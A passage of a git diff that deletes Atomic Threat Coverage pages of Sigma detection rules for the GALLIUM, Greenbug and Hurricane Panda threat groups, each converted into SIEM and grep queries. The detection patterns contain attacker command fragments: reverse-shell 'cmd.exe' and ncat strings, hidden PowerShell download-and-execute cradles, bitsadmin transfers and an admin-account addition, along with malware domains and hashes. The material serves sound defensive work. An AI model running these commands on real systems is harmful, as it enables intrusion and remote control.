-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'GALLIUM Artefacts'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/440a56bf-7873-4439-940a-1c8a671073c2-3 <<EOF
-{
-  "metadata": {
-    "title": "GALLIUM Artefacts",
-    "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.",
-    "tags": [
-      "attack.credential_access",
-      "attack.command_and_control"
-    ],
-    "query": "(sha1:(\"e570585edc69f9074cb5e8a790708336bd45ca0f\") AND (NOT (winlog.event_data.Image.keyword:(*\\:\\\\Program\\ Files\\(x86\\)\\\\* OR *\\:\\\\Program\\ Files\\\\*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(sha1:(\"e570585edc69f9074cb5e8a790708336bd45ca0f\") AND (NOT (winlog.event_data.Image.keyword:(*\\:\\\\Program\\ Files\\(x86\\)\\\\* OR *\\:\\\\Program\\ Files\\\\*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'GALLIUM Artefacts'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-sha1:("53a44c2396d15c3a03723fa5e5db54cafd527635" "9c5e496921e3bc882dc40694f1dcc3746a75db19" "aeb573accfd95758550cf30bf04f389a92922844" "79ef78a797403a4ed1a616c68e07fff868a8650a" "4f6f38b4cec35e895d91c052b1f5a83d665c2196" "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" "e841a63e47361a572db9a7334af459ddca11347a" "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" "2e94b305d6812a9f96e6781c888e48c7fb157b6b" "dd44133716b8a241957b912fa6a02efde3ce3025" "8793bf166cb89eb55f0593404e4e933ab605e803" "a39b57032dbb2335499a51e13470a7cd5d86b138" "41cc2b15c662bc001c0eb92f6cc222934f0beeea" "d209430d6af54792371174e70e27dd11d3def7a7" "1c6452026c56efd2c94cea7e0f671eb55515edb0" "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" "4923d460e22fbbf165bbbaba168e5a46b8157d9f" "f201504bd96e81d0d350c3a8332593ee1c9e09de" "ddd2db1127632a2a52943a2fe516a2e7d05d70d2")
-(EventID:"257" AND QNAME:("asyspy256.ddns.net" "hotkillmail9sddcc.ddns.net" "rosaf112.ddns.net" "cvdfhjh1231.myftp.biz" "sz2016rose.ddns.net" "dffwescwer4325.myftp.biz" "cvdfhjh1231.ddns.net"))
-(sha1:("e570585edc69f9074cb5e8a790708336bd45ca0f") AND (NOT (Image.keyword:(*\:\\Program Files\(x86\)\\* *\:\\Program Files\\*))))
-```
-
-
-### splunk
-    
-```
-(sha1="53a44c2396d15c3a03723fa5e5db54cafd527635" OR sha1="9c5e496921e3bc882dc40694f1dcc3746a75db19" OR sha1="aeb573accfd95758550cf30bf04f389a92922844" OR sha1="79ef78a797403a4ed1a616c68e07fff868a8650a" OR sha1="4f6f38b4cec35e895d91c052b1f5a83d665c2196" OR sha1="1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" OR sha1="e841a63e47361a572db9a7334af459ddca11347a" OR sha1="c28f606df28a9bc8df75a4d5e5837fc5522dd34d" OR sha1="2e94b305d6812a9f96e6781c888e48c7fb157b6b" OR sha1="dd44133716b8a241957b912fa6a02efde3ce3025" OR sha1="8793bf166cb89eb55f0593404e4e933ab605e803" OR sha1="a39b57032dbb2335499a51e13470a7cd5d86b138" OR sha1="41cc2b15c662bc001c0eb92f6cc222934f0beeea" OR sha1="d209430d6af54792371174e70e27dd11d3def7a7" OR sha1="1c6452026c56efd2c94cea7e0f671eb55515edb0" OR sha1="c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" OR sha1="4923d460e22fbbf165bbbaba168e5a46b8157d9f" OR sha1="f201504bd96e81d0d350c3a8332593ee1c9e09de" OR sha1="ddd2db1127632a2a52943a2fe516a2e7d05d70d2")
-(EventCode="257" (QNAME="asyspy256.ddns.net" OR QNAME="hotkillmail9sddcc.ddns.net" OR QNAME="rosaf112.ddns.net" OR QNAME="cvdfhjh1231.myftp.biz" OR QNAME="sz2016rose.ddns.net" OR QNAME="dffwescwer4325.myftp.biz" OR QNAME="cvdfhjh1231.ddns.net"))
-((sha1="e570585edc69f9074cb5e8a790708336bd45ca0f") NOT ((Image="*:\\Program Files(x86)\\*" OR Image="*:\\Program Files\\*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" sha1 IN ["53a44c2396d15c3a03723fa5e5db54cafd527635", "9c5e496921e3bc882dc40694f1dcc3746a75db19", "aeb573accfd95758550cf30bf04f389a92922844", "79ef78a797403a4ed1a616c68e07fff868a8650a", "4f6f38b4cec35e895d91c052b1f5a83d665c2196", "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d", "e841a63e47361a572db9a7334af459ddca11347a", "c28f606df28a9bc8df75a4d5e5837fc5522dd34d", "2e94b305d6812a9f96e6781c888e48c7fb157b6b", "dd44133716b8a241957b912fa6a02efde3ce3025", "8793bf166cb89eb55f0593404e4e933ab605e803", "a39b57032dbb2335499a51e13470a7cd5d86b138", "41cc2b15c662bc001c0eb92f6cc222934f0beeea", "d209430d6af54792371174e70e27dd11d3def7a7", "1c6452026c56efd2c94cea7e0f671eb55515edb0", "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a", "4923d460e22fbbf165bbbaba168e5a46b8157d9f", "f201504bd96e81d0d350c3a8332593ee1c9e09de", "ddd2db1127632a2a52943a2fe516a2e7d05d70d2"])
-(event_source="DNS Server" event_id="257" QNAME IN ["asyspy256.ddns.net", "hotkillmail9sddcc.ddns.net", "rosaf112.ddns.net", "cvdfhjh1231.myftp.biz", "sz2016rose.ddns.net", "dffwescwer4325.myftp.biz", "cvdfhjh1231.ddns.net"])
-(event_id="1" sha1 IN ["e570585edc69f9074cb5e8a790708336bd45ca0f"]  -(Image IN ["*:\\Program Files(x86)\\*", "*:\\Program Files\\*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*53a44c2396d15c3a03723fa5e5db54cafd527635|.*9c5e496921e3bc882dc40694f1dcc3746a75db19|.*aeb573accfd95758550cf30bf04f389a92922844|.*79ef78a797403a4ed1a616c68e07fff868a8650a|.*4f6f38b4cec35e895d91c052b1f5a83d665c2196|.*1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d|.*e841a63e47361a572db9a7334af459ddca11347a|.*c28f606df28a9bc8df75a4d5e5837fc5522dd34d|.*2e94b305d6812a9f96e6781c888e48c7fb157b6b|.*dd44133716b8a241957b912fa6a02efde3ce3025|.*8793bf166cb89eb55f0593404e4e933ab605e803|.*a39b57032dbb2335499a51e13470a7cd5d86b138|.*41cc2b15c662bc001c0eb92f6cc222934f0beeea|.*d209430d6af54792371174e70e27dd11d3def7a7|.*1c6452026c56efd2c94cea7e0f671eb55515edb0|.*c6b41d3afdcdcaf9f442bbe772f5da871801fd5a|.*4923d460e22fbbf165bbbaba168e5a46b8157d9f|.*f201504bd96e81d0d350c3a8332593ee1c9e09de|.*ddd2db1127632a2a52943a2fe516a2e7d05d70d2)'
-grep -P '^(?:.*(?=.*257)(?=.*(?:.*asyspy256\.ddns\.net|.*hotkillmail9sddcc\.ddns\.net|.*rosaf112\.ddns\.net|.*cvdfhjh1231\.myftp\.biz|.*sz2016rose\.ddns\.net|.*dffwescwer4325\.myftp\.biz|.*cvdfhjh1231\.ddns\.net)))'
-grep -P '^(?:.*(?=.*(?:.*e570585edc69f9074cb5e8a790708336bd45ca0f))(?=.*(?!.*(?:.*(?=.*(?:.*.*:\Program Files\(x86\)\\.*|.*.*:\Program Files\\.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_greenbug_may20.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_greenbug_may20.md
deleted file mode 100644
index 8d9c45f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_greenbug_may20.md
+++ /dev/null
@@ -1,197 +0,0 @@
-| Title                    | Greenbug Campaign Indicators       |
-|:-------------------------|:------------------|
-| **Description**          | Detects tools and process executions as observed in a Greenbug campaign in May 2020 |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0049</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Greenbug Campaign Indicators
-id: 3711eee4-a808-4849-8a14-faf733da3612
-status: experimental
-description: Detects tools and process executions as observed in a Greenbug campaign in May 2020
-references:
-    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
-author: Florian Roth
-date: 2020/05/20
-modified: 2020/05/21
-tags:
-    - attack.g0049
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine|contains|all: 
-            - 'bitsadmin /transfer'
-            - 'CSIDL_APPDATA'
-    selection2:
-        CommandLine|contains: 
-            - 'CSIDL_SYSTEM_DRIVE'
-    selection3: 
-        CommandLine|contains:
-            - '\msf.ps1'
-            - '8989 -e cmd.exe'
-            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
-            - '-nop -w hidden -c $k=new-object'
-            - '[Net.CredentialCache]::DefaultCredentials;IEX '
-            - ' -nop -w hidden -c $m=new-object net.webclient;$m'
-            - '-noninteractive -executionpolicy bypass whoami'
-            - '-noninteractive -executionpolicy bypass netstat -a'
-            - 'L3NlcnZlc'  # base64 encoded '/server='
-    selection4:
-        Image|endswith:
-            - '\adobe\Adobe.exe'
-            - '\oracle\local.exe'
-            - '\revshell.exe'
-            - 'infopagesbackup\ncat.exe'
-            - 'CSIDL_SYSTEM\cmd.exe'
-            - '\programdata\oracle\java.exe'
-            - 'CSIDL_COMMON_APPDATA\comms\comms.exe'
-            - '\Programdata\VMware\Vmware.exe'
-    condition: 1 of them
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "CommandLine.*.*bitsadmin /transfer.*" -and $_.message -match "CommandLine.*.*CSIDL_APPDATA.*") -or ($_.message -match "CommandLine.*.*CSIDL_SYSTEM_DRIVE.*") -or ($_.message -match "CommandLine.*.*\\msf.ps1.*" -or $_.message -match "CommandLine.*.*8989 -e cmd.exe.*" -or $_.message -match "CommandLine.*.*system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill.*" -or $_.message -match "CommandLine.*.*-nop -w hidden -c $k=new-object.*" -or $_.message -match "CommandLine.*.*[Net.CredentialCache]::DefaultCredentials;IEX .*" -or $_.message -match "CommandLine.*.* -nop -w hidden -c $m=new-object net.webclient;$m.*" -or $_.message -match "CommandLine.*.*-noninteractive -executionpolicy bypass whoami.*" -or $_.message -match "CommandLine.*.*-noninteractive -executionpolicy bypass netstat -a.*" -or $_.message -match "CommandLine.*.*L3NlcnZlc.*") -or ($_.message -match "Image.*.*\\adobe\\Adobe.exe" -or $_.message -match "Image.*.*\\oracle\\local.exe" -or $_.message -match "Image.*.*\\revshell.exe" -or $_.message -match "Image.*.*infopagesbackup\\ncat.exe" -or $_.message -match "Image.*.*CSIDL_SYSTEM\\cmd.exe" -or $_.message -match "Image.*.*\\programdata\\oracle\\java.exe" -or $_.message -match "Image.*.*CSIDL_COMMON_APPDATA\\comms\\comms.exe" -or $_.message -match "Image.*.*\\Programdata\\VMware\\Vmware.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.CommandLine.keyword:*bitsadmin\ \/transfer* AND winlog.event_data.CommandLine.keyword:*CSIDL_APPDATA*) OR winlog.event_data.CommandLine.keyword:(*CSIDL_SYSTEM_DRIVE*) OR winlog.event_data.CommandLine.keyword:(*\\msf.ps1* OR *8989\ \-e\ cmd.exe* OR *system.Data.SqlClient.SqlDataAdapter\($cmd\);\ \[void\]$da.fill* OR *\-nop\ \-w\ hidden\ \-c\ $k\=new\-object* OR *\[Net.CredentialCache\]\:\:DefaultCredentials;IEX\ * OR *\ \-nop\ \-w\ hidden\ \-c\ $m\=new\-object\ net.webclient;$m* OR *\-noninteractive\ \-executionpolicy\ bypass\ whoami* OR *\-noninteractive\ \-executionpolicy\ bypass\ netstat\ \-a* OR *L3NlcnZlc*) OR winlog.event_data.Image.keyword:(*\\adobe\\Adobe.exe OR *\\oracle\\local.exe OR *\\revshell.exe OR *infopagesbackup\\ncat.exe OR *CSIDL_SYSTEM\\cmd.exe OR *\\programdata\\oracle\\java.exe OR *CSIDL_COMMON_APPDATA\\comms\\comms.exe OR *\\Programdata\\VMware\\Vmware.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3711eee4-a808-4849-8a14-faf733da3612 <<EOF
-{
-  "metadata": {
-    "title": "Greenbug Campaign Indicators",
-    "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020",
-    "tags": [
-      "attack.g0049"
-    ],
-    "query": "((winlog.event_data.CommandLine.keyword:*bitsadmin\\ \\/transfer* AND winlog.event_data.CommandLine.keyword:*CSIDL_APPDATA*) OR winlog.event_data.CommandLine.keyword:(*CSIDL_SYSTEM_DRIVE*) OR winlog.event_data.CommandLine.keyword:(*\\\\msf.ps1* OR *8989\\ \\-e\\ cmd.exe* OR *system.Data.SqlClient.SqlDataAdapter\\($cmd\\);\\ \\[void\\]$da.fill* OR *\\-nop\\ \\-w\\ hidden\\ \\-c\\ $k\\=new\\-object* OR *\\[Net.CredentialCache\\]\\:\\:DefaultCredentials;IEX\\ * OR *\\ \\-nop\\ \\-w\\ hidden\\ \\-c\\ $m\\=new\\-object\\ net.webclient;$m* OR *\\-noninteractive\\ \\-executionpolicy\\ bypass\\ whoami* OR *\\-noninteractive\\ \\-executionpolicy\\ bypass\\ netstat\\ \\-a* OR *L3NlcnZlc*) OR winlog.event_data.Image.keyword:(*\\\\adobe\\\\Adobe.exe OR *\\\\oracle\\\\local.exe OR *\\\\revshell.exe OR *infopagesbackup\\\\ncat.exe OR *CSIDL_SYSTEM\\\\cmd.exe OR *\\\\programdata\\\\oracle\\\\java.exe OR *CSIDL_COMMON_APPDATA\\\\comms\\\\comms.exe OR *\\\\Programdata\\\\VMware\\\\Vmware.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.CommandLine.keyword:*bitsadmin\\ \\/transfer* AND winlog.event_data.CommandLine.keyword:*CSIDL_APPDATA*) OR winlog.event_data.CommandLine.keyword:(*CSIDL_SYSTEM_DRIVE*) OR winlog.event_data.CommandLine.keyword:(*\\\\msf.ps1* OR *8989\\ \\-e\\ cmd.exe* OR *system.Data.SqlClient.SqlDataAdapter\\($cmd\\);\\ \\[void\\]$da.fill* OR *\\-nop\\ \\-w\\ hidden\\ \\-c\\ $k\\=new\\-object* OR *\\[Net.CredentialCache\\]\\:\\:DefaultCredentials;IEX\\ * OR *\\ \\-nop\\ \\-w\\ hidden\\ \\-c\\ $m\\=new\\-object\\ net.webclient;$m* OR *\\-noninteractive\\ \\-executionpolicy\\ bypass\\ whoami* OR *\\-noninteractive\\ \\-executionpolicy\\ bypass\\ netstat\\ \\-a* OR *L3NlcnZlc*) OR winlog.event_data.Image.keyword:(*\\\\adobe\\\\Adobe.exe OR *\\\\oracle\\\\local.exe OR *\\\\revshell.exe OR *infopagesbackup\\\\ncat.exe OR *CSIDL_SYSTEM\\\\cmd.exe OR *\\\\programdata\\\\oracle\\\\java.exe OR *CSIDL_COMMON_APPDATA\\\\comms\\\\comms.exe OR *\\\\Programdata\\\\VMware\\\\Vmware.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Greenbug Campaign Indicators'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((CommandLine.keyword:*bitsadmin \/transfer* AND CommandLine.keyword:*CSIDL_APPDATA*) OR CommandLine.keyword:(*CSIDL_SYSTEM_DRIVE*) OR CommandLine.keyword:(*\\msf.ps1* *8989 \-e cmd.exe* *system.Data.SqlClient.SqlDataAdapter\($cmd\); \[void\]$da.fill* *\-nop \-w hidden \-c $k=new\-object* *\[Net.CredentialCache\]\:\:DefaultCredentials;IEX * * \-nop \-w hidden \-c $m=new\-object net.webclient;$m* *\-noninteractive \-executionpolicy bypass whoami* *\-noninteractive \-executionpolicy bypass netstat \-a* *L3NlcnZlc*) OR Image.keyword:(*\\adobe\\Adobe.exe *\\oracle\\local.exe *\\revshell.exe *infopagesbackup\\ncat.exe *CSIDL_SYSTEM\\cmd.exe *\\programdata\\oracle\\java.exe *CSIDL_COMMON_APPDATA\\comms\\comms.exe *\\Programdata\\VMware\\Vmware.exe))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*bitsadmin /transfer*" CommandLine="*CSIDL_APPDATA*") OR (CommandLine="*CSIDL_SYSTEM_DRIVE*") OR (CommandLine="*\\msf.ps1*" OR CommandLine="*8989 -e cmd.exe*" OR CommandLine="*system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill*" OR CommandLine="*-nop -w hidden -c $k=new-object*" OR CommandLine="*[Net.CredentialCache]::DefaultCredentials;IEX *" OR CommandLine="* -nop -w hidden -c $m=new-object net.webclient;$m*" OR CommandLine="*-noninteractive -executionpolicy bypass whoami*" OR CommandLine="*-noninteractive -executionpolicy bypass netstat -a*" OR CommandLine="*L3NlcnZlc*") OR (Image="*\\adobe\\Adobe.exe" OR Image="*\\oracle\\local.exe" OR Image="*\\revshell.exe" OR Image="*infopagesbackup\\ncat.exe" OR Image="*CSIDL_SYSTEM\\cmd.exe" OR Image="*\\programdata\\oracle\\java.exe" OR Image="*CSIDL_COMMON_APPDATA\\comms\\comms.exe" OR Image="*\\Programdata\\VMware\\Vmware.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((CommandLine="*bitsadmin /transfer*" CommandLine="*CSIDL_APPDATA*") OR CommandLine IN ["*CSIDL_SYSTEM_DRIVE*"] OR CommandLine IN ["*\\msf.ps1*", "*8989 -e cmd.exe*", "*system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill*", "*-nop -w hidden -c $k=new-object*", "*[Net.CredentialCache]::DefaultCredentials;IEX *", "* -nop -w hidden -c $m=new-object net.webclient;$m*", "*-noninteractive -executionpolicy bypass whoami*", "*-noninteractive -executionpolicy bypass netstat -a*", "*L3NlcnZlc*"] OR Image IN ["*\\adobe\\Adobe.exe", "*\\oracle\\local.exe", "*\\revshell.exe", "*infopagesbackup\\ncat.exe", "*CSIDL_SYSTEM\\cmd.exe", "*\\programdata\\oracle\\java.exe", "*CSIDL_COMMON_APPDATA\\comms\\comms.exe", "*\\Programdata\\VMware\\Vmware.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*bitsadmin /transfer.*)(?=.*.*CSIDL_APPDATA.*))|.*(?:.*.*CSIDL_SYSTEM_DRIVE.*)|.*(?:.*.*\msf\.ps1.*|.*.*8989 -e cmd\.exe.*|.*.*system\.Data\.SqlClient\.SqlDataAdapter\(\$cmd\); \[void\]\$da\.fill.*|.*.*-nop -w hidden -c \$k=new-object.*|.*.*\[Net\.CredentialCache\]::DefaultCredentials;IEX .*|.*.* -nop -w hidden -c \$m=new-object net\.webclient;\$m.*|.*.*-noninteractive -executionpolicy bypass whoami.*|.*.*-noninteractive -executionpolicy bypass netstat -a.*|.*.*L3NlcnZlc.*)|.*(?:.*.*\adobe\Adobe\.exe|.*.*\oracle\local\.exe|.*.*\revshell\.exe|.*.*infopagesbackup\ncat\.exe|.*.*CSIDL_SYSTEM\cmd\.exe|.*.*\programdata\oracle\java\.exe|.*.*CSIDL_COMMON_APPDATA\comms\comms\.exe|.*.*\Programdata\VMware\Vmware\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_hurricane_panda.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_hurricane_panda.md
deleted file mode 100644
index 22e2e6d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_hurricane_panda.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Hurricane Panda Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Hurricane Panda Activity |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1068: Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/](https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0009</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Hurricane Panda Activity
-id: 0eb2107b-a596-422e-b123-b389d5594ed7
-author: Florian Roth
-date: 2019/03/04
-status: experimental
-description: Detects Hurricane Panda Activity
-references:
-    - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
-tags:
-    - attack.privilege_escalation
-    - attack.g0009
-    - attack.t1068
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* localgroup administrators admin /add'
-            - '*\Win64.exe*'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* localgroup administrators admin /add" -or $_.message -match "CommandLine.*.*\\Win64.exe.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ localgroup\ administrators\ admin\ \/add OR *\\Win64.exe*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0eb2107b-a596-422e-b123-b389d5594ed7 <<EOF
-{
-  "metadata": {
-    "title": "Hurricane Panda Activity",
-    "description": "Detects Hurricane Panda Activity",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.g0009",
-      "attack.t1068"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ localgroup\\ administrators\\ admin\\ \\/add OR *\\\\Win64.exe*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ localgroup\\ administrators\\ admin\\ \\/add OR *\\\\Win64.exe*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Hurricane Panda Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* localgroup administrators admin \/add *\\Win64.exe*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* localgroup administrators admin /add" OR CommandLine="*\\Win64.exe*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* localgroup administrators admin /add", "*\\Win64.exe*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* localgroup administrators admin /add|.*.*\Win64\.exe.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_judgement_panda_gtr19.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_judgement_panda_gtr19.md
deleted file mode 100644
index 6e3ce7a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_judgement_panda_gtr19.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Judgement Panda Exfil Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1098: Account Manipulation](https://attack.mitre.org/techniques/T1098)</li><li>[T1002: Data Compressed](https://attack.mitre.org/techniques/T1002)</li><li>[T1560: Archive Collected Data](https://attack.mitre.org/techniques/T1560)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
